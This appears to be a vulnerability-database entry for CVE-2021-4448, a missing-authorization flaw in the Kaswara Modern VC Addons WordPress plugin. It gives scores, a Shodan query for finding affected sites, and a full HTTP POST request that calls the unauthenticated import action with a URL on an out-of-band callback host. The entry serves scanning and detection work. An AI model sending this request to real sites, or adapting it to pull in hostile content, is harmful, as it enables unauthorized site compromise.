| Title | Kaswara Modern VC Addons <= 3.0.1 - Missing Authorization |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | Unauthenticated attackers can perform unauthorized actions including file uploads, deletions, and data import, potentially leading to site compromise. |
| Remediation | Deactivate and delete the plugin from the server |
| CVSS Score | 7.3 |
| EPSS Score | 0.43626 |
| CVE ID | CVE-2021-4448 |
| CWE ID | CWE-862 |
| Shodan Query | html:"kaswara" |
| Tags | cve cve2021 wp wordpress wp-plugin kaswara oast vkev |
The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=kaswaraImportDemo&contentUrl=http://d5joa11le0o4ac1i9me0jbosrdc14xk5d.oast.online/
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-4448.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-4448.pcap
N/AN/A